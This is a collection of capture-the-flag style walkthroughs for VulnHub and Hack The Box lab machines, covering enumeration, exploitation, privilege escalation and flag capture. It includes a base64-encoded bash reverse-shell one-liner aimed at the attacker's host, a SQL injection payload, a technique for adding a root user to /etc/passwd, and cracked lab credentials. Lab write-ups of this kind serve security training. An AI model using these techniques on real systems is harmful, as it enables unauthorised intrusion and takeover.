- Once downloaded Joy and extracted with VMware:

2 - ENUMERATION

- netdiscover helps to identify Joy's IP 192.168.1.23:

- Scanning with Nmap:

- Scanning deeper port 21 we discover Anonymous FTP server and two folders, download and upload:

- download seems to be empty, however upload gives a lot of information:

- Connecting to the FTP server:

- Going to upload:

- Getting directory:

- Reading directory there are a lof of files inside:

- However let's focus our attention on the file version_control:

- At this moment the file is not accessible, so we need to copy it to the folder /upload ,what it's doable because it has read and write permissions.

- Using commands site cpfr and site cpto to copy version_control:

http://www.proftpd.org/docs/contrib/mod_copy.html

- Copying version_control to /upload has been successful:

- Getting version_control:

3 - EXPLOITATION

- Reading the file we discover some potential vulnerabilities regarding ProFTPd version 1.3.5. Also the new webroot is /var/www/tryingharderisjoy:

- Msfconsole searchs for exploits:

- Setting option SITEPATH as the new webroot /var/www/tryingharderisjoy:

- So finally we have a remote shell.

4 - PRIVILEGE ESCALATION

- Browsing around some content:

- Inside folder ossec we find essential credentials:

- Switching to root does not work:

- However switching to patrick works, and this user has some sudoer privileges on the file test:

- Running test we are asked to change permissions to a file, for instance let's make /bin/bash executable with permission SUID bit set 4777:

https://www.slashroot.in/suid-and-sgid-linux-explained-examples

- Now, user patrick can run /bin/bash and get a root shell:

5 - CAPTURING THE FLAG

- Reading proof.txt:

Development

2021-11-12T11:20:00.064-06:00

DEVELOPMENT

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine Development from the VulnHub pentesting platform.

- Development can be downloaded from here:

https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/

- Once downloaded Development and extracted with Vmware:

2 - ENUMERATION

- netdiscover helps to identify Development's IP 192.168.1.21:

- This machine seems to have different potential solutions, however I will stick to the walkthrough that I have used to resolve it, mainly the web server at port 8080 and SSH service at port 22.

- Scanning with Nmap:

- Scanning deeper port 8080:

- Connecting to the web server at port 8080 we learn about html_pages:

- Browsing html_pages there is a Linux directory list:

- Most of those web pages are just distractions of the hacking process, however development.html holds interesting information:

- Viewing the source it seems that /developmentsecretpage is the right way to follow:

- Connecting to /developmentsecretpage:

- Clicking Patrick's:

- Clicking Click here to log out we find a login form:

3 - EXPLOITATION

- Trying any credentials the login works, for instance abcde:abcde:

- The page shows a PHP error message about a deprecated function that leads to a vulnerability related to slogin_lib.inc.php:

- Looking for a related exploit we find this File Disclosure/Remote File Inclusion:

- Trying the exploit we find credentials for 4 users:

- Decrypting the hashes:

- So the new credentials are:

intern:12345678900987654321

patrick:P@ssw0rd25

qiu:qiu

- After trying unsuccessfully SSH for patrick and qiu, the only account that works is intern:

- However the shell is not working fine, because just some commands are allowed:

- Following this instructions we can improve the Lshell and get rid of the limitations:

https://www.aldeid.com/wiki/Lshell

4 - CAPTURING THE 1st FLAG

- Reading local.txt:

5 - PRIVILEGE ESCALATION

- User intern has no sudoer privileges:

- However user patrick's sudoer privileges allow him to use editors like vim and nano:

- The strategy to achieve Privilege Escalation will be to edit /etc/passwd adding a line with root credentials for a new user.

- First, let's create the hash for the new user whitelist:qwerty:

- Inserting the corresponding line at the bottom of /etc/passwd:

- Finally, switching to user whitelist we have a root shell:

6 - CAPTURING THE 2nd FLAG

- Reading proof.txt:

DJINN-1

2021-11-10T08:45:00.130-06:00

DJINN-1

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine DJINN-1 from the VulnHub pentesting platform.

- DJINN-1 can be downloaded from here:

https://www.vulnhub.com/entry/djinn-1,397/

- Once downloaded DJINN-1 and extracted with VirtualBox:

2 - ENUMERATION

- Scanning with Nmap we learn that ports 21, 1337, 7331 are open:

- FTP allows Anonymous login. Also, there are 3 text files available:

- Port 1337 holds a math game:

- Port 7331 runs a web server:

- Connecting to FTP server we find the 3 text files:

- Getting creds.txt, game.txt and message.txt:

- Reading the 3 files:

- Connecting to web browser at port 7331:

- Dirbusting port 7331 we find web pages genie and wish:

- Connecting to genie:

- Connecting to wish:

- Executing command id:

- The server redirects to web page genie and outputs answer at URL:

- Same thing for command pwd:

- Same thing for command ls:

3 - EXPLOITATION

- One potential vector attack would be to execute remotely a bash command at wish web page.

- The bash command is encoded with base64:

- Setting a nc listener session at port 4444:

- Entering the command to wish, previously decoding and passing it to bash:

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTUvNDQ0NCAwPiYxCg== | base64 -d | bash

- Finally, a remote shell is triggered at Kali:

- Removing the nasty duplicated letters with command stty -echo:

- Improving the shell:

- There are home folders for users nitish and sam:

- Exploring nitish we find user.txt, but access is denied:

- Reading app.py we find a line pointing to nitish credentials:

- So folder .dev keeps file creds.txt with credentials for user nitish:

4 - CAPTURING THE 1st FLAG

- Now, the 1st flag is available:

5 - PRIVILEGE ESCALATION

- There are different ways to achieve Privilege Escalation, we will try two of them:

5.1 - Sudoers

- Checking sudoer privileges we learn that nitish can run command genie as user sam:

- Checking genie file type we discover it has setuid:

- Discovering how genie works:

- Passing some inputs to command genie:

- Finally we are able to get a shell for user sam:

- Checking sam's sudoer privileges, he can run command lago as a root:

- Running command lago with different inputs:

- Checking the file .pyc we find that it's a compiled bytecode Python script:

- Also, opening .pyc we find a lot of words that recall of lago:

- So it seems reasonable to think that it could be a close relationship between lago and .pyc. Maybe are the same thing?

- With the purpose of studying in dept the file, let's transfer .pyc from DIJNN-1 to Kali:

- Installing decompiler uncompyle6:

- Decompyling .pyc we find that it actually corresponds to script lago, and there is a couple of lines that give us the answer to achieve a /bin/sh shell:

- So entering word num as answer finally we get a root shell:

5.2 - Remote command injection

- Connecting with nc to port 1337 there is a math game:

- Trying a remote injection with command pwd the result is successful:

- Same thing with command ls:

- Same thing with command cat /etc/passwd:

- Setting a listening session at port 4444:

- Injecting this remote command:

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

- Finally, a reverse shell is back at Kali:

6 - CAPTURING THE 2nd FLAG

- Going to root folder:

- Reading proof.sh:

- Executing proof.sh:

SAR-1

2021-11-07T10:52:00.423-06:00

SAR-1

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine SAR-1 from the VulnHub pentesting platform.

- SAR-1 can be downloaded from here:

https://www.vulnhub.com/entry/sar-1,425/

- Once downloaded SAR-1 and extracted with VirtualBox:

2 - ENUMERATION

- IP for SAR-1 is 192.168.1.16:

- Scanning with Nmap we discover that port 80 is open:

- Browsing the web server:

- Dirbusting we find robots.txt:

- robots.txt contains hint sar2HTML:

- Checking web page sar2HTML:

3 - EXPLOITATION

- sar2html is a plotting tool for system statistics (sar data), actually there is a Remote Command Execution exploit for version 3.2.1:

- Using the exploit we can execute some commands, for instance "id" and "cat /etc/passwd":

- Also, we can explore directories content with "pwd" and "ls", discovering sarDATA, sarFILE and uPLOAD:

- Now, using Msfvenom let's create a PHP reverse exploit called sar1.php:

- Starting the corresponding Meterpreter listening session:

- Uploading sar1.php to the website:

- The upload is successful and the exploit sar1.php is now at folder /uPLOAD:

- Running the exploit (just clicking sar1.php) a Meterpreter session is opened:

- Getting a shell:

- Looking for content:

4 - CAPTURING THE 1st FLAG

- Reading user.txt:

5 - PRIVILEGE ESCALATION

- As expected, access to root folder is not allowed, so we need Privilege Escalation:

- Looking for cron jobs, we find that the script finally.sh is run every 5 minutes:

- finally.sh executes write.sh:

- Script finally.sh is run with root privileges:

- The strategy for Privilege Escalation will be to remove current write.sh and create a new one that will open a reverse shell connection.

- Removing write.sh:

- Writing a new script write.sh:

- Transferring the new script from Kali to SAR1:

- Opening a listening session at Kali port 4444:

- As a consequence of write.sh being run as part of the cron job finally.sh, after some minutes a reverse root shell is achieved:

6 - CAPTURING THE 2nd FLAG

- Reading root.txt:

DC-9

2021-11-06T08:47:00.047-05:00

DC-9

- Layout for this exercise:

1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine DC-9 from the VulnHub pentesting platform.

- DC-9 can be downloaded from here:

https://www.vulnhub.com/entry/dc-9,412/

- Once downloaded DC-9 and extracted with VirtualBox:

2 - ENUMERATION

- IP for DC-9 is 192.168.1.14:

- Scanning with Nmap, port 22 is filtered and port 80 is open:

- Checking the web server:

- Going to Manage:

3 - EXPLOITATION

- Let's explore the form Search, intercepting with Burp and saving it:

- Forms are prone to Injection Attackts, so let's use the saved item with Sqlmap to find a vulnerable injection point:

- Looking for databases we find Staff and users:

- Dumping all from Staff we find passwords and usernames:

- Same thing with database users:

- Decrypting admin's password:

- Logging with admin:transorbital1:

- The footer message File does not exist suggest that function include is being used, so maybe there is a LFI vulnerability:

- Remembering that SSH service is filtered (see Nmap oputput) and going around some configuration files we find /etc/knockd.conf, what contains an SSH number sequence:

- Using knock command to unblock access to SSH service:

- Hydra helps finding SSH accounts:

- SSH-ing with janitor:Ilovepeepee:

- Looking for interesting files:

- New credentials:

- Again Hydra helps finding new SSH accounts:

- SSH-ing with fredf:B4-Tru3-001:

4 - PRIVILEGE ESCALATION

- Checking fredf's sudoers permissions:

- test is an executable file:

- test takes two files as parameters, appending content of the first to the second:

- Using without parameters:

- The strategy for achieving Privilege Escalation will be to create a new user whitelist with root privileges, and appending its record to /etc/passwd with executable test.

- openssl encrypts whitelist:qwerty:

- Adding username, encrypted password and :0::0::root:/bin/bash so that whitelist has root privileges:

- Appending the encrypted line to /etc/passwd with test:

- Checking that the line has been correctly appended:

- Logging as whitelist:qwerty we have a root shell:

5 - CAPTURING THE FLAG

- Reading theflag.txt:

Bastion

2019-07-31T23:00:00.000-05:00

BASTION

- Layout for this exercise:

1 - INTRODUCTION

- The goal for this exercise is to develop a hacking process for the vulnerable machine Bastion from Hack The Box pentesting platform:

https://www.hackthebox.eu/

2 - ENUMERATION

- Bastion's IP is 10.10.10.134:

- Scanning with Nmap there are four open ports: 22, 135,139 and 445.

- Scanning deeper those four ports it seems that we have an SMB service running on port 445:

- This Nmap script enumerates the four shared folders:

- Connecting with smbclient:

- As expected, both ADMIN$ and C$ are not accessible:

- IPC$ seems accessible, but it does not yield any valuable information:

- However folder Backups gives us a lot of very important information about Bastion:

- Getting and reading note.txt it gives us a hint about backup related problems:

- Getting and reading SDT65CB.tmp it seems that the file is empty:

- Going into folder WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351:

- There are some .vhd and .xml files:

- VHD (Virtual Hard Disk) is a file format representing a virtual hard disk drive (HDD).

- It may contain what is found on a physical HDD, such as disk partitions and a file system, which in turn can contain files and folders.

- It is typically used as the hard disk of a virtual machine.

https://en.wikipedia.org/wiki/VHD_(file_format)

- Getting the 1st .vhd file and applying command strings over it we find a lot of strings, but nothing that could lead to find any interesting hint for our purpose:

............................

3 - EXPLOITATION

3.1 - Mounting the backup .vhd disk

- About the 2nd .vhd disk it is too large (5.4 GB) to check with strings, so it would be a better solution to mount it locally.

- Installing cifs-utils:

- Creating folder /Backups:

- Mounting locally the shared folder /Backups:

- The mounting process is successful:

- Looking for the 2nd .vhd disk:

- The guestmount program can be used to mount virtual machine filesystems and other disk images on the host.

- It uses libguestfs for access to the guest filesystem, and FUSE (the "filesystem in userspace") to make it appear as a mountable device.

http://libguestfs.org/guestmount.1.html

- Installing libguestfs-tools:

- Creating folder /vhd2:

- Using guestmount to mount the 2nd .vhd disk on local folder /mnt/vhd2:

- The mounting process is successful, so now we have access to the whole backup disk .vhd2:

3.2 - Getting the Security Account Manager (SAM)

- The Security Account Manager (SAM) is the database where Windows systems store users's passwords.

- The user passwords are stored in a hashed format in a registry hive either as a LM hash or as a NTLM hash.

- Bastion is a Windows Server 2016 so it uses NTLM hashes for sure.

- This file can be found in %SystemRoot%/System32/config/SAM and is mounted on HKLM/SAM:

- Using samdump2 to retrieve hashes from Bastion's users:

- Accounts Administrator and Guest are disabled, so let's write down hash for user L4mpje:

26112010952d963c8dc4217daec986d9

3.3 - Cracking the NTLM hash

- Hashkiller works online to decrypt the NTLM hash found in previous point:

3.4 - Getting a remote shell

- Now, using credentials L4mpje:bureaulampje we have an SSH connection and a remote shell:

4 - CAPTURING THE 1st FLAG

- Reading user.txt from user l4mpje's Desktop:

5 - PRIVILEGE ESCALATION

- As expected Administrator's Desktop is not accessible, so we need some type of Privilege Escalation:

- Browsing around with the command line we check the presence of the .vhd and .xml files found before:

- Going to L4mpje's home folder:

- However looking for hidden folders we discover a lot more available resources:

- Going inside AppData\Roaming there is a very interesting folder named mRemoteNG:

- Actually mRemoteNG is an open source remote control and connections manager:

- Reading confCons.xml we find encrypted credentials for Administrator:

- It happens that there are online available tools for dealing with mRemoteNG encrypted credentials, for instance the Python script named mremoteng_decrypt.py:

- Launching the script without parameters to explore available optional arguments:

- Applying the -s option, because the encrypted password seems to be encoded with base64 (see the final ==):

- So finally we have the Administrator's password: thXLHM96BeKL0ER2

- Connecting with SSH as Administrator we have a privileged remote shell:

6 - CAPTURING THE 2nd FLAG

- Reading root.txt:

SecNotes

2019-07-31T13:52:00.000-05:00

SECNOTES

- Layout for this exercise:

1 - INTRODUCTION

- The goal for this exercise is to develop a hacking process for the vulnerable machine SecNotes from the Hack The Box pentesting platform:

https://www.hackthebox.eu/

2 - ENUMERATION

- SecNotes' IP is 10.10.10.97:

- Scanning with Nmap:

- Browsing the web server on port 80:

- Registering a new user whitelist:

- Login as the new user whitelist:

- Secure Notes is a notepad application that stores notes and to-do list with secure password protection using AES encryption and providing quick and easy access using a simple password:

- The email tyler@secnotes.htb informs about two details:

user named tyler
domain secnotes.htb

- Also, it is interesting the .php extension at the login page, revealing PHP is run by the server.

- Confirming the existence of user tyler with a random password:

- Browsing the other web server at port 8808:

- Viewing the source we find the image iisstart.png:

3 - EXPLOITATION

3.1 - SQL injection

- "Second order" SQL injection attack delays execution until a secondary query, by injecting a query fragment into a query (that’s not necessarily vulnerable to injection), and then have that injected SQL execute in a second query that is vulnerable to SQL injection.

https://portswigger.net/kb/issues/00100210_sql-injection-second-order

https://bertwagner.com/2018/03/20/how-to-steal-data-using-a-second-order-sql-injection-attack/

- Using wfuzz to help us finding a valid SQL injection:

- From the proposed queries the last one ' or 1=1 or ''=' seems easy to apply:

- Entering ' or 1=1 or ''=' as a new user and password, and later login with those credentials:

- Now the home page yields credentials for user tyler at the 3rd note named new site:

3.2 - Exploiting SMB

- Using credentials tyler:92g!mA8BGjOirkL%OG*& to access SMB service on port 445:

- Connecting and listing new-site:

- So we confirm that there is a web service at port 8808 where folder new-site contains the image iisstart.png.

3.3 - Getting a remote shell

- First of all let's download to Kali the Windows Netcat application:

- Also let's create exploit.php, a PHP exploit which goal is to spawn a remote shell with a Netcat connection:

- Transferring nc.exe and exploit.php from Kali to SecNotes:

- The transfer of both files is successful:

- Setting a Netcat listening on port 5555:

- Running exploit.php directly on the browser:

- A remote shell is successfully spawned:

4 - CAPTURING THE 1st FLAG

- Reading user.txt:

5 - PRIVILEGE ESCALATION

- Access to Administrator's account is denied, as expected, so we need Privilege Escalation:

- Checking user tyler's Desktop there is a file bash.lnk:

- Windows Subsystem for Linux (WSL) is a compatibility layer for running Linux binary executables (in ELF format) natively on Windows 10 and Windows Server 2019.

https://en.wikipedia.org/wiki/Windows_Subsystem_for_Linux

- Reading bash.lnk the path C:\Windows\System32\bash.exe seems to be interesting:

- However the clue is false because there is no bash.exe at C:\Windows\System32:

- Let's find real location for bash.exe:

- Running bash.exe we get a root shell for the Windows Subsystem for Linux (WSL):

- Improving the shell:

- Checking content of root home folder there is the hidden file .bash_history:

- Reading .bash_history credentials for Administrator are available:

- Making use of credentials administrator%u6!4ZwgwOM#^OBf#Nwnh there are two ways of accessing the Administrator's account:

5.1 - Smbclient

- Connecting with the SMB service:

5.2 - Psexec.py

- The Impacket Psexec.py Python script helps to get a remote root shell, just by providing credentials for Administrator:

6 - CAPTURING THE 2nd FLAG

- So we have two options to read root.txt:

- First, transferring root.txt from SecNotes to Kali and reading it locally:

- Second, reading it from the remote root shell:

Jeeves

2019-07-30T11:18:00.000-05:00

JEEVES

- Layout for this exercise:

1 - INTRODUCTION

- The goal for this exercise is to develop a hacking process for the vulnerable machine Jeeves from the Hack The Box pentesting platform:

https://www.hackthebox.eu/

2 - ENUMERATION

- Jeeves's IP is 10.10.10.63:

- Scanning with Nmap:

- Connecting to the web server on port 80:

- Connecting to the web server on port 50000:

- Applying dirbuster to both web servers we find the folder askjeeves on port 50000:

- Browsing /askjeeves we find a Jenkins server.

- Jenkins is an open source automation server which enables developers around the world to reliably build, test, and deploy their software:

https://jenkins.io/

- Going to Manage Jenkins:

- Checking the Script Console there is available a Groovy Script that allows to write and run code on the server:

3 - EXPLOITATION

3.1 - Getting a remote reverse shell

- The Apache Groovy language is a Java-syntax-compatible object-oriented programming language that can be used as both a programming and scripting language for the Java Platform:

- There are multiple available scripts for getting a reverse shell, for instance this one:

- Just setting a Netcat listener session, adapting the script to our needs and running it:

- The consequence is a remote reverse shell:

- The user is kohsuke:

- However it seems that we cannot get out of the current folder due to lack of enough administrative privileges:

3.2 - Meterpreter session with web_delivery

- Let's create a web_delivery exploit on Kali with the purpose of getting a Meterpreter session:

- Setting all options and running the web_delivery exploit a Powershell script is created:

- Now, the Powershell script must be run on the remote reverse shell from Jeeves:

- As a consequence a Meterpreter session is opened:

- Getting information about the current folder, user and the system:

4 - PRIVILEGE ESCALATION

- RottenPotato is a local privilege escalation binary from service account to System:

- Downloading rottenpotato.exe to Kali:

- Getting as many system privilege as possible with getprivs:

- Uploading rottenpotato.exe to Jeeves:

- Loading the incognito extension:

- Executing rottenpotato.exe:

- Impersonating as System:

- Now we've got System privileges:

- Spawning a shell:

5 - CAPTURING THE 1st FLAG

- Reading user.txt:

6 - CAPTURING THE 2nd FLAG

- Going to the Administrator's Desktop we find hm.txt:

- Alternate Data Stream (ADS) is the ability of an NTFS file system (the main file system format in Windows) to store different streams of data, in addition to the default stream which is normally used for a file.

- The two stream types that are commonly used directly by Windows programs are data ($DATA) and index ($INDEX_ALLOCATION).

- The relevant attribute for our scope is the $DATA attribute, which is used to store the data streams of a file.

- In the past, it was common to store a malicious payload within an ADS of a legitimate file. But today, many today security solutions will detect and scan ADSs’.

- For further information:

https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams

https://www.deepinstinct.com/2018/06/12/the-abuse-of-alternate-data-stream-hasnt-disappeared/

https://stackoverflow.com/questions/50518734/dir-r-and-output-stream-in-windows-machine

- The option dir /R calls FindFirstStreamW and FindNextStreamW on each file or directory in a listing in order to list its $DATA streams: